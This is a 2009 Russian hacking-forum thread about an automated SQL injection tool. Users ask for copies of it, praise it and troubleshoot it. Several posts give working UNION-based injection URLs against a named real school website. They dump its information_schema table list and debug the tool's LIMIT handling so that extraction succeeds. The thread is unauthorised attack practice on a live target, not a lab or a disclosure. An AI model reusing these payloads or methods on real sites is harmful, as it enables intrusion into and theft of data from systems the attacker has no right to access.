ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Избранное
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #91  
Старый 09.04.2009, 22:30
Аватар для almazz
almazz
Познающий
Регистрация: 29.03.2009
Сообщений: 36
Провел на форуме:
595180

Репутация: 11
По умолчанию

бля на файлбим закиньте некачаеться
 
Ответить с цитированием

  #92  
Старый 13.04.2009, 18:05
Аватар для IDW
IDW
Новичок
Регистрация: 08.09.2008
Сообщений: 21
Провел на форуме:
26253

Репутация: 7
Отправить сообщение для IDW с помощью ICQ
По умолчанию

а чё с сайтом? там редирект на какой-то левак
 
Ответить с цитированием

  #93  
Старый 15.04.2009, 16:56
Аватар для fker
fker
Участник форума
Регистрация: 26.11.2008
Сообщений: 158
Провел на форуме:
2816163

Репутация: 158
По умолчанию

пыщьь . Если у кого есть, поделитесь 3-й версией.
 
Ответить с цитированием

  #94  
Старый 17.04.2009, 04:52
Аватар для o3,14um
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789

Репутация: 227
По умолчанию

третья версия

огромный респект за прогу, улчше третьей версии и панголина в тыщи раз)) на данный момент самая крутая прога для работу с мускулями =)

Последний раз редактировалось o3,14um; 17.04.2009 в 05:10..
 
Ответить с цитированием

  #95  
Старый 31.05.2009, 12:48
Аватар для farpost
farpost
Познающий
Регистрация: 16.05.2009
Сообщений: 42
Провел на форуме:
190310

Репутация: 7
По умолчанию

Беда в следующем. Пробую разные сайты подверженные SQL INJ вручную таблицы и колонки из Information_Schema выдёргиваются нормально. С помощью SIPT нормально получается выводить версию БД итд... НО удаётся получить только таблицу COLLATIONS. В чём проблема?

 
Ответить с цитированием

  #96  
Старый 31.05.2009, 18:56
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

может просто не быть прав на чтение, или пустые все остальные, что врядли. Вообще SIPT4 - ахрененная штука, но только после детального анализа РУЧКАМИ.

Плюс у тебя не стоит галочка напротив Encoding AES - очень может быть в этом всё дело. Или РУЧКАМИ в браузере попробуй unhex(hex(ДАННЫЕ))

Да, SIPT4 - это чудо, но чудо автоматизации, а что-либо автоматизировать можно только когда знаешь весь процесс от и до.
 
Ответить с цитированием

  #97  
Старый 31.05.2009, 19:14
Аватар для HAXTA4OK
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

может быть что просто БД разные))))не обязательно что стоит тока infor.... могут быть и другие)))
 
Ответить с цитированием

  #98  
Старый 31.05.2009, 20:04
Аватар для farpost
farpost
Познающий
Регистрация: 16.05.2009
Сообщений: 42
Провел на форуме:
190310

Репутация: 7
По умолчанию

Цитата:
вручную таблицы и колонки из Information_Schema выдёргиваются нормально
галка Encoding AES не помогла
 
Ответить с цитированием

  #99  
Старый 31.05.2009, 20:24
Аватар для farpost
farpost
Познающий
Регистрация: 16.05.2009
Сообщений: 42
Провел на форуме:
190310

Репутация: 7
По умолчанию

Рассмотрим на живом примере теперь.

Цитата:
http://www.tauntonschool.co.uk/foundation/index.php?id=-539'+union+select+1,2,GROUP_CONCAT(table_name),4+f rom+information_schema.tables+--+
Видим таблицы:

Цитата:
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_ APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN _USAGE,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATIST ICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIG GERS,USER_PRIVILEGES,VIEWS,courier_news_files,cour ier_news_schools,events,events_images,file_categor ies,file_categories_dev,............
Теперь скормим программе:



Опять нашёл только одну таблицу. WTF??

Последний раз редактировалось farpost; 31.05.2009 в 20:34..
 
Ответить с цитированием

  #100  
Старый 31.05.2009, 20:49
Аватар для farpost
farpost
Познающий
Регистрация: 16.05.2009
Сообщений: 42
Провел на форуме:
190310

Репутация: 7
По умолчанию

Проблему нашёл:
SIPT делает два запроса:

Превый:

Цитата:
http://www.tauntonschool.co.uk/foundation/index.php?id=539'+UNION+SELECT+CONCAT(0x7873716C69 6E6A626567696E,(SELECT+CONCAT(TABLE_NAME,0x7873716 C696E6A64656C,TABLE_SCHEMA)+FROM+INFORMATION_SCHEM A.TABLES+LIMIT+1,1),0x7873716C696E6A656E64)+LIMIT+ 1,1--+
Результатом выполнения которого появляется 1я таблица (непонятно почему нулевая отбрасывается).

Во вотором запросе, LIMIT после ПОДзапроса должен увеличиться на 1 (то есть стать LIMIT+2,1). Но программа почему то увеличивает и LIMIT в конце всего запроса на 1.
В итоге получается такой запрос:

Цитата:
http://www.tauntonschool.co.uk/foundation/index.php?id=539'+UNION+SELECT+CONCAT(0x7873716C69 6E6A626567696E,(SELECT+CONCAT(TABLE_NAME,0x7873716 C696E6A64656C,TABLE_SCHEMA)+FROM+INFORMATION_SCHEM A.TABLES+LIMIT+2,1),0x7873716C696E6A656E64)+LIMIT+2,1--+
Который само собой ничего не выводит.

Второй запрос должен быть таким:

Цитата:
http://www.tauntonschool.co.uk/foundation/index.php?id=539'+UNION+SELECT+CONCAT(0x7873716C69 6E6A626567696E,(SELECT+CONCAT(TABLE_NAME,0x7873716 C696E6A64656C,TABLE_SCHEMA)+FROM+INFORMATION_SCHEM A.TABLES+LIMIT+2,1),0x7873716C696E6A656E64)+LIMIT+1,1--+

Это у меня сборка такая косячная или я чего то не догоняю???

_____________________________


И наконец то нашёл косяк в том что стоит галка AddLimit.


То что изменяется limit вконце помоему всё равно косяк большой. Хорошо бы поправить. Если не понятно, почему я считаю это косяком, могу разъяснить.

Последний раз редактировалось farpost; 31.05.2009 в 21:21..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection для чайников, взлом ASP+MSSQL k00p3r Чужие Статьи 0 12.06.2005 12:42
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ